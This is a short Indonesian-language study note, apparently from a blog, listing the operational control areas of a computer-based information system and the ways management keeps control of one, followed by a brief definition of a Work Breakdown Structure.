Kontrol pengoperasian system didasarkan pada struktur organisasional dari departemen operasi, aktivitas dari unit yang ada dalam departemen tersebut.
Kontrol yang memberikan kontribusi terhadap tujuan ini dapat diklasifikasikan menjadi lima area :
1. Struktur organisasional
2. Kontrol perpustakaan
3. Pemeliharaan peralatan
4. Kontrol lingkungan dan kemanan fasilitas
5. Perencanaan disaster, meliputi area :
- Rencana keadaan darurat (emergency plan)
- Rencana back-up (backup plan)

- Rencana record penting (vital record plan)
- Rencana recovery (recovery plan)

Metode Mendapatkan Dan Memelihara Kontrol
Manajemen dapat melakukan kontrol dengan tiga cara, yaitu :
 Manajemen dapat melakukan kontrol langsung, yaitu mengevaluasi kemajuan dan penampilan, dan menentukan tindakan koreksi apa yang harus dilakukan
 Manajemen mengontrol CBIS secara tidak langsung dengan terus menerus melalui CIO.
 Manajemen mengontrol CBIS secara tidak langsung berkenan dengan proyeknya melalui pihak ketiga.
sumber : santiw.staff.gunadarma.ac.id

WBS(Work Breakdown Structure)

WBS adalah suatu metode mengorganisasikan proyek menjadi struktur laporan hirarki atau memecah proyek menjadi subyek yang lebih detail. Salah satu contoh adalah struktur navigasi pada Penulisan Ilmiah atau skripsi atau bisa juga dengan flowchart.